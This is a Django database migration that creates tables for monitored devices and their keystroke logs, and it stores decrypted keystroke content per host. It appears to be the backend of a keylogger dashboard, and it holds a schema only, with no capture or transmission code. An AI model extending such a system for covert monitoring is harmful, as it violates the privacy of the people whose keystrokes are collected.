# Generated by Django 5.1.2 on 2025-05-18 07:05

import django.db.models.deletion
import uuid
from django.db import migrations, models


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='MonitoredDevice',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('hostname', models.CharField(db_index=True, max_length=255, unique=True)),
                ('display_name', models.CharField(blank=True, max_length=100, null=True)),
                ('device_uuid', models.UUIDField(default=uuid.uuid4, editable=False, unique=True)),
                ('first_seen', models.DateTimeField(auto_now_add=True)),
                ('last_seen', models.DateTimeField(auto_now=True)),
                ('is_active', models.BooleanField(default=True)),
            ],
            options={
                'verbose_name': 'Monitored Device',
                'verbose_name_plural': 'Monitored Devices',
                'ordering': ['-last_seen'],
            },
        ),
        migrations.CreateModel(
            name='KeystrokeLog',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('server_timestamp', models.DateTimeField(auto_now_add=True, db_index=True)),
                ('decrypted_content', models.TextField()),
                ('device', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='logs', to='dashboard.monitoreddevice')),
            ],
            options={
                'verbose_name': 'Keystroke Log',
                'verbose_name_plural': 'Keystroke Logs',
                'ordering': ['-server_timestamp'],
            },
        ),
    ]
